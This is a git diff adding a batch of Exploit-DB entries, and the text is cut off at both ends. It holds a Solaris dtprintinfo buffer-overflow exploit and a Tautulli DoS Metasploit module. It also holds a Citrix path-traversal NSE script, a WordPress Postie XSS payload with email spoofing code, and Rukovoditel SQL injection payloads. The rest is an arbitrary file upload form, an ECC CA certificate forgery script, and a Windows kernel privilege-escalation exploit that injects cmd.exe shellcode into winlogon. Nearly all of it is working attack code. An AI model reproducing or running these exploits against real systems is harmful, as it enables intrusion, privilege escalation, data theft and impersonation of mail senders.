*/ + add_env(payload); + add_env(display); + add_env("HOME=/tmp"); + add_env(NULL); + + /* calculate the payload address */ + payaddr = sb - OFFSET; + + /* prepare the evil palette name */ + memset(buf, 'A', sizeof(buf)); + buf[sizeof(buf) - 1] = 0x0; + + /* fill with function address in ld.so.1, saved eip, and arguments */ + for (i = PADDING; i < BUFSIZE - 16; i += 4) { + set_val(buf, i, ret); /* strcpy */ + set_val(buf, i += 4, rwx_mem); /* saved eip */ + set_val(buf, i += 4, rwx_mem); /* 1st argument */ + set_val(buf, i += 4, payaddr); /* 2nd argument */ + } + + /* prepare the evil .Xdefaults file */ + fp = fopen("/tmp/.Xdefaults", "w"); + if (!fp) { + perror("error creating .Xdefaults file"); + exit(1); + } + fprintf(fp, "*0*ColorPalette: %s\n", buf); // or *0*MonochromePalette + fclose(fp); + + /* prepare the evil palette file (badchars currently not handled) */ + mkdir("/tmp/.dt", 0755); + mkdir("/tmp/.dt/palettes", 0755); + sprintf(palette_file, "/tmp/.dt/palettes/%s", buf); + fp = fopen(palette_file, "w"); + if (!fp) { + perror("error creating palette file"); + exit(1); + } + fprintf(fp, "Black\n"); + fclose(fp); + + /* print some output */ + sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); + sysinfo(SI_RELEASE, release, sizeof(release) - 1); + fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); + fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); + fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); + fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); + fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); + + /* run the vulnerable program */ + execve(VULN, arg, env); + perror("execve"); + exit(0); +} + +/* + * add_env(): add a variable to envp and pad if needed + */ +int add_env(char *string) +{ + int i; + + /* null termination */ + if (!string) { + env[env_pos] = NULL; + return env_len; + } + + /* add the variable to envp */ + env[env_pos] = string; + env_len += strlen(string) + 1; + env_pos++; + + /* pad the envp using zeroes */ + if ((strlen(string) + 1) % 4) + for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { + env[env_pos] = string + strlen(string); + env_len++; + } + + return env_len; +} + +/* + * check_zero(): check an address for the presence of a 0x00 + */ +void check_zero(int addr, char *pattern) +{ + if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || + !(addr & 0xff000000)) { + fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); + exit(1); + } +} + +/* + * search_ldso(): search for a symbol inside ld.so.1 + */ +int search_ldso(char *sym) +{ + int addr; + void *handle; + Link_map *lm; + + /* open the executable object file */ + if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { + perror("dlopen"); + exit(1); + } + + /* get dynamic load information */ + if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { + perror("dlinfo"); + exit(1); + } + + /* search for the address of the symbol */ + if ((addr = (int)dlsym(handle, sym)) == NULL) { + fprintf(stderr, "sorry, function %s() not found\n", sym); + exit(1); + } + + /* close the executable object file */ + dlclose(handle); + + check_zero(addr - 4, sym); + return addr; +} + +/* + * search_rwx_mem(): search for an RWX memory segment valid for all + * programs (typically, /usr/lib/ld.so.1) using the proc filesystem + */ +int search_rwx_mem(void) +{ + int fd; + char tmp[16]; + prmap_t map; + int addr = 0, addr_old; + + /* open the proc filesystem */ + sprintf(tmp,"/proc/%d/map", (int)getpid()); + if ((fd = open(tmp, O_RDONLY)) < 0) { + fprintf(stderr, "can't open %s\n", tmp); + exit(1); + } + + /* search for the last RWX memory segment before stack (last - 1) */ + while (read(fd, &map, sizeof(map))) + if (map.pr_vaddr) + if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { + addr_old = addr; + addr = map.pr_vaddr; + } + close(fd); + + /* add 4 to the exact address NULL bytes */ + if (!(addr_old & 0xff)) + addr_old |= 0x04; + if (!(addr_old & 0xff00)) + addr_old |= 0x0400; + + return addr_old; +} + +/* + * set_val(): copy a dword inside a buffer (little endian) + */ +void set_val(char *buf, int pos, int val) +{ + buf[pos] = (val & 0x000000ff); + buf[pos + 1] = (val & 0x0000ff00) >> 8; + buf[pos + 2] = (val & 0x00ff0000) >> 16; + buf[pos + 3] = (val & 0xff000000) >> 24; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/47929.rb b/exploits/multiple/webapps/47929.rb new file mode 100755 index 000000000..a3aec5061 --- /dev/null +++ b/exploits/multiple/webapps/47929.rb @@ -0,0 +1,38 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service', + 'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.', + 'Author' => 'Ismail Tasdelen', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2019-19833'], + ['EDB', '47785'] + ] + ) + register_options([ Opt::RPORT(8181) ]) + end + + def run + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/shutdown' + }) + + if res + print_status("Request sent to #{rhost}") + else + print_status("No reply from #{rhost}") + end + rescue Errno::ECONNRESET + print_status('Connection reset') + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/47930.txt b/exploits/multiple/webapps/47930.txt new file mode 100644 index 000000000..a300fe02f --- /dev/null +++ b/exploits/multiple/webapps/47930.txt @@ -0,0 +1,130 @@ +# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal +# Date: 2019-12-17 +# CVE: CVE-2019-19781 +# Vulenrability: Path Traversal +# Vulnerablity Discovery: Mikhail Klyuchnikov +# Exploit Author: Dhiraj Mishra +# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 +# Vendor Homepage: https://www.citrix.com/ +# References: https://support.citrix.com/article/CTX267027 +# https://github.com/nmap/nmap/pull/1893 + +local http = require "http" +local stdnse = require "stdnse" +local shortport = require "shortport" +local table = require "table" +local string = require "string" +local vulns = require "vulns" +local nmap = require "nmap" +local io = require "io" + +description = [[ +This NSE script checks whether the traget server is vulnerable to +CVE-2019-19781 +]] +--- +-- @usage +-- nmap --script https-citrix-path-traversal -p +-- nmap --script https-citrix-path-traversal -p --script-args +output='file.txt' +-- @output +-- PORT STATE SERVICE +-- 443/tcp open http +-- | CVE-2019-19781: +-- | Host is vulnerable to CVE-2019-19781 +-- @changelog +-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) +-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) +-- @xmloutput +-- +-- Citrix ADC Path Traversal aka (Shitrix) +-- VULNERABLE +--
+-- Citrix Application Delivery Controller (ADC) and Gateway 10.5, +11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path +-- traversal vulnerability that allows attackers to read configurations or +any other file. +--
+-- +--
+-- 2019 +-- 17 +-- 12 +--
+-- +-- 17-12-2019 +-- +--
+-- +-- https://support.citrix.com/article/CTX267027 +-- https://nvd.nist.gov/vuln/detail/CVE-2019-19781 +--
+-- + +author = "Dhiraj Mishra (@RandomDhiraj)" +Discovery = "Mikhail Klyuchnikov (@__Mn1__)" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"discovery", "intrusive","vuln"} + +portrule = shortport.ssl + +action = function(host,port) + local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil + local vuln = { + title = 'Citrix ADC Path Traversal', + state = vulns.STATE.NOT_VULN, + description = [[ +Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, +12.1, and 13.0 are vulnerable +to a unauthenticated path traversal vulnerability that allows attackers to +read configurations or any other file. + ]], + references = { + 'https://support.citrix.com/article/CTX267027', + 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', + }, + dates = { + disclosure = {year = '2019', month = '12', day = '17'}, + }, + } + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + local path = "/vpn/../vpns/cfg/smb.conf" + local response + local output = {} + local success = "Host is vulnerable to CVE-2019-19781" + local fail = "Host is not vulnerable" + local match = "[global]" + local credentials + local citrixADC + response = http.get(host, port.number, path) + + if not response.status then + stdnse.print_debug("Request Failed") + return + end + if response.status == 200 then + if string.match(response.body, match) then + stdnse.print_debug("%s: %s GET %s - 200 OK", +SCRIPT_NAME,host.targetname or host.ip, path) + vuln.state = vulns.STATE.VULN + citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname +or host.ip,port.number, path)) + if outputFile then + credentials = response.body:gsub('%W','.') +vuln.check_results = stdnse.format_output(true, citrixADC) + vuln.extra_info = stdnse.format_output(true, "Credentials are being +stored in the output file") +file = io.open(outputFile, "a") +file:write(credentials, "\n") + else + vuln.check_results = stdnse.format_output(true, citrixADC) + end + end + elseif response.status == 403 then + stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname +or host.ip, path, response.status) + vuln.state = vulns.STATE.NOT_VULN + end + + return vuln_report:make_output(vuln) +end \ No newline at end of file diff --git a/exploits/php/webapps/47925.txt b/exploits/php/webapps/47925.txt new file mode 100644 index 000000000..47044e2b1 --- /dev/null +++ b/exploits/php/webapps/47925.txt @@ -0,0 +1,85 @@ +# Exploit Title: WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting +# Google Dork: inurl:/wp-content/plugins/postie/readme.txt +# Date: 2020-01-15 +# Exploit Author: V1n1v131r4 +# Vendor Homepage: https://postieplugin.com/ +# Software Link: https://wordpress.org/plugins/postie/#developers +# Version: <=1.9.40 +# Tested on: Linux +# CVE : CVE-2019-20203, CVE-2019-20204 + +## Identifying WordPress Postie Plugin installation + +#!/bin/bash if curl -s -o /dev/null -w "%{http_code}" http:///wp-content/plugins/postie/readme.txt | grep 200 > /dev/null; then echo "" echo "Postie installed!" else echo "" echo "Postie seems not to be installed" fi + +## Performing persistent XSS using Polyglot JavaScript syntax with crafted SVG (CVE-2019-20204) + +# the syntax below should go as email body + +jaVasCript:/*--> + +## Email to post on Postie + +- Identifying the mail server + + dig domain.com mx + +- enumerating accounts via SMTP + + telnet domain.com 587 + EHLO buddy + mail from: + rcpt to: + vrfy user@domain.com + + +- listing accounts via third party software + + You can use these third party software and APIs to enumerate target email users: + - https://www.zerobounce.net + - https://tools.verifyemailaddress.io/ + - https://hunter.io/email-verifier + + + +## Spoofing with PHPMailer + + +Mail sent!'; + else echo '

Something went wrong...

'; + + + // FULL HEADER + // $headers = "From: testsite < mail@testsite.com >\n"; + // $headers .= "Cc: testsite < mail@testsite.com >\n"; + // $headers .= "X-Sender: testsite < mail@testsite.com >\n"; + // $headers .= 'X-Mailer: PHP/' . phpversion(); + // $headers .= "X-Priority: 1\n"; + // $headers .= "Return-Path: mail@testsite.com\n"; + // $headers .= "MIME-Version: 1.0\r\n"; + // $headers .= "Content-Type: text/html; charset=iso-8859-1\n"; + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/47926.txt b/exploits/php/webapps/47926.txt new file mode 100644 index 000000000..b953dbaf5 --- /dev/null +++ b/exploits/php/webapps/47926.txt @@ -0,0 +1,45 @@ +# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection +# Google Dork: N/A +# Date: 2020-01-15 +# Blog: https://fatihhcelik.blogspot.com/ +# Exploit Author: Fatih Çelik +# Vendor Homepage: https://www.rukovoditel.net/ +# Software Link: https://sourceforge.net/projects/rukovoditel/ +# Version: 2.5.2 +# Tested on: Kali Linux +# CVE : N/A + +# Request, + +POST /ruko/index.php?module=items/listing HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/ruko/index.php?module=reports/view&reports_id=68%27 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 330 +Connection: close +Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver + +redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 + +# PAYLOADS, + +# Parameter: reports_id (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + +Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' RLIKE (SELECT (CASE WHEN (9654=9654) THEN 68 ELSE 0x28 END))-- AlKt&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 8112 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(8112=8112,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rVyr&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 4324 FROM (SELECT(SLEEP(5)))KySi)-- Pfwf&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1 \ No newline at end of file diff --git a/exploits/php/webapps/47928.txt b/exploits/php/webapps/47928.txt new file mode 100644 index 000000000..1677bb8d2 --- /dev/null +++ b/exploits/php/webapps/47928.txt @@ -0,0 +1,22 @@ +# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload +# Google Dork: N/A +# Date: 2020-01-16 +# Exploit Author: Or4nG.M4n aka S4udiExploit +# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ +# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip +# Version: 1.0 +# Tested on: MY MIND v1.23.45 +# CVE: N/A +# WWW . SEC4EVER . COM + -> hola amigos ^.^ + -> just copy this html code +
+ + + + +
+ -> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php +# i think am back %^_^% +# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com +# big thanks to Stupid Coder ^.^ \ No newline at end of file diff --git a/exploits/php/webapps/47931.txt b/exploits/php/webapps/47931.txt new file mode 100644 index 000000000..e76004576 --- /dev/null +++ b/exploits/php/webapps/47931.txt @@ -0,0 +1,48 @@ +# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection +# Google Dork: N/A +# Date: 2020-01-15 +# Blog: https://fatihhcelik.blogspot.com/ +# Exploit Author: Fatih Çelik +# Vendor Homepage: https://www.rukovoditel.net/ +# Software Link: https://sourceforge.net/projects/rukovoditel/ +# Version: 2.5.2 +# Tested on: Kali Linux +# CVE : N/A + + + +# Request, +GET /ruko/index.php?module=entities/fields&entities_id=25 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/ruko/index.php?module=entities/fields&entities_id=25 +Connection: close +Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +# PAYLOADS, + +# Parameter: entities_id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause + +Payload: module=entities/fields&entities_id=25' AND 2091=2091 AND 'emRY'='emRY + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: module=entities/fields&entities_id=25' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(2023=2023,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZZpM'='ZZpM + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: module=entities/fields&entities_id=25' AND (SELECT 5681 FROM (SELECT(SLEEP(5)))rdOz) AND 'vWza'='vWza + +# Type: UNION query +# Title: Generic UNION query (NULL) - 23 columns + +Payload: module=entities/fields&entities_id=25' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706a71,0x5a664143527068525459496254624c514e45694d42776a6d67614a68434c6762434f62514d4f4566,0x7162787871),NULL-- syQw \ No newline at end of file diff --git a/exploits/php/webapps/47934.txt b/exploits/php/webapps/47934.txt new file mode 100644 index 000000000..56af517fa --- /dev/null +++ b/exploits/php/webapps/47934.txt @@ -0,0 +1,57 @@ +# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection +# Google Dork: N/A +# Date: 2020-01-15 +# Blog: https://fatihhcelik.blogspot.com/ +# Exploit Author: Fatih Çelik +# Vendor Homepage: https://www.rukovoditel.net/ +# Software Link: https://sourceforge.net/projects/rukovoditel/ +# Version: 2.5.2 +# Tested on: Kali Linux +# CVE : N/A + +# Request, + +POST /ruko/index.php?module=tools/users_login_log&action=listing HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/ruko/index.php?module=tools/users_login_log +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 125 +Connection: close +Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver + +page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D= + + +# PAYLOADS, + +# Parameter: filters[1][value] (POST) +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm + +# Parameter: filters[0][value] (POST) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + +Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1 + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1 + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1 \ No newline at end of file diff --git a/exploits/windows/local/47933.rb b/exploits/windows/local/47933.rb new file mode 100755 index 000000000..19f2d24a4 --- /dev/null +++ b/exploits/windows/local/47933.rb @@ -0,0 +1,23 @@ +# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47933.zip + +require 'openssl' + +raw = File.read "ca.crt" +ca_cert = OpenSSL::X509::Certificate.new(raw) + +# Parse public key from CA +ca_key = ca_cert.public_key +if !(ca_key.instance_of? OpenSSL::PKey::EC) then + puts "CA NOT ECC" + puts "Type: " + key.inspect + exit +end + +# Set new group with fake generator G = Q +ca_key.private_key = 1 +group = ca_key.group +group.set_generator(ca_key.public_key, group.order, group.cofactor) +group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE +ca_key.group = group + +puts ca_key.to_pem \ No newline at end of file diff --git a/exploits/windows_x86-64/local/47935.cpp b/exploits/windows_x86-64/local/47935.cpp new file mode 100644 index 000000000..3e98bd130 --- /dev/null +++ b/exploits/windows_x86-64/local/47935.cpp @@ -0,0 +1,707 @@ +/* +The exploit works on 19H1. +It was tested with ntoskrnl version 10.0.18362.295 + +EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47935.zip +*/ + +#include +#include +#include +#include +#include +#include +#include + +#pragma comment(lib, "ntdll.lib") + +// run cmd.exe +unsigned char shellcode[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \ +"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \ +"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \ +"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \ +"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \ +"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \ +"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \ +"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \ +"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \ +"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \ +"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \ +"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \ +"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \ +"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \ +"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \ +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \ +"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \ +"\x78\x65\x00"; + +static const unsigned int shellcode_len = 0x1000; + +#define MAXIMUM_FILENAME_LENGTH 255 +#define SystemModuleInformation 0xb +#define SystemHandleInformation 0x10 + +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO +{ + ULONG ProcessId; + UCHAR ObjectTypeNumber; + UCHAR Flags; + USHORT Handle; + void* Object; + ACCESS_MASK GrantedAccess; +} SYSTEM_HANDLE, * PSYSTEM_HANDLE; + +typedef struct _SYSTEM_HANDLE_INFORMATION +{ + ULONG NumberOfHandles; + SYSTEM_HANDLE Handels[1]; +} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; + +typedef struct SYSTEM_MODULE { + ULONG Reserved1; + ULONG Reserved2; +#ifdef _WIN64 + ULONG Reserved3; +#endif + PVOID ImageBaseAddress; + ULONG ImageSize; + ULONG Flags; + WORD Id; + WORD Rank; + WORD w018; + WORD NameOffset; + CHAR Name[MAXIMUM_FILENAME_LENGTH]; +}SYSTEM_MODULE, * PSYSTEM_MODULE; + +typedef struct SYSTEM_MODULE_INFORMATION { + ULONG ModulesCount; + SYSTEM_MODULE Modules[1]; +} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; + +// exploit specific type information +typedef struct _FILE_FULL_EA_INFORMATION { + ULONG NextEntryOffset; // +0x0 + UCHAR Flags; // +4 + UCHAR EaNameLength; // +5 + USHORT EaValueLength; // +6 + CHAR EaName[1]; // +9 +} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION; + +typedef struct _PROC_DATA { + HANDLE apcthread; // +0x0 + void* unknown1; // +0x8 + void* unknown2; // +0x10 + void* unknown3; // +0x18 + void* unknown4; // +0x20 +} PROC_DATA, * PPROC_DATA; + +typedef struct _SOCK_DATA { + HANDLE unknown; // +0x0 + HANDLE procDataHandle; // +0x8 +} SOCK_DATA, * PSOCK_DATA; + +// undocumented apis definitions + +typedef NTSTATUS(WINAPI* NtWriteFile_t)(HANDLE FileHandle, + HANDLE Event, + PIO_APC_ROUTINE ApcRoutine, + PVOID ApcContext, + PIO_STATUS_BLOCK IoStatusBlock, + PVOID Buffer, + ULONG Length, + PLARGE_INTEGER ByteOffset, + PULONG key); + +typedef NTSTATUS(WINAPI* NtTestAlert_t)(void); + +typedef NTSTATUS(WINAPI* RtlGetVersion_t)(PRTL_OSVERSIONINFOW lpVersionInformation); + +// resolved function pointers at runtime +NtTestAlert_t g_NtTestAlert = 0; +NtWriteFile_t g_NtWriteFile = 0; +RtlGetVersion_t g_RtlGetVersion = 0; + +HANDLE g_Event1 = NULL; +HANDLE g_Event2 = NULL; +HANDLE g_Event3 = NULL; + +int g_done1 = 0; +int g_done2 = 0; + +#define TOKEN_OFFSET 0x40 //_SEP_TOKEN_PRIVILEGES offset +#define OFFSET_LINKEDLIST 0xA8 //kthread apc offset + +// generic helper function + +void InjectToWinlogon() +{ + PROCESSENTRY32 entry; + entry.dwSize = sizeof(PROCESSENTRY32); + + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + + int pid = -1; + if (Process32First(snapshot, &entry)) + { + while (Process32Next(snapshot, &entry)) + { + if (_strcmpi(entry.szExeFile, "winlogon.exe") == 0) + { + pid = entry.th32ProcessID; + break; + } + } + } + + CloseHandle(snapshot); + + if (pid < 0) + { + printf("Could not find process\n"); + return; + } + + HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); + if (!h) + { + printf("Could not open process: %x", GetLastError()); + return; + } + + void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!buffer) + { + printf("[-] VirtualAllocEx failed\n"); + } + + if (!buffer) + { + printf("[-] remote allocation failed"); + return; + } + + if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0)) + { + printf("[-] WriteProcessMemory failed"); + return; + } + + HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0); + + if (hthread == INVALID_HANDLE_VALUE) + { + printf("[-] CreateRemoteThread failed"); + return; + } +} + +HMODULE GetNOSModule() +{ + HMODULE hKern = 0; + hKern = LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES); + return hKern; +} + +DWORD64 GetModuleAddr(const char* modName) +{ + PSYSTEM_MODULE_INFORMATION buffer = (PSYSTEM_MODULE_INFORMATION)malloc(0x20); + + DWORD outBuffer = 0; + NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, 0x20, &outBuffer); + + if (status == STATUS_INFO_LENGTH_MISMATCH) + { + free(buffer); + buffer = (PSYSTEM_MODULE_INFORMATION)malloc(outBuffer); + status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, outBuffer, &outBuffer); + } + + if (!buffer) + { + printf("[-] NtQuerySystemInformation error\n"); + return 0; + } + + for 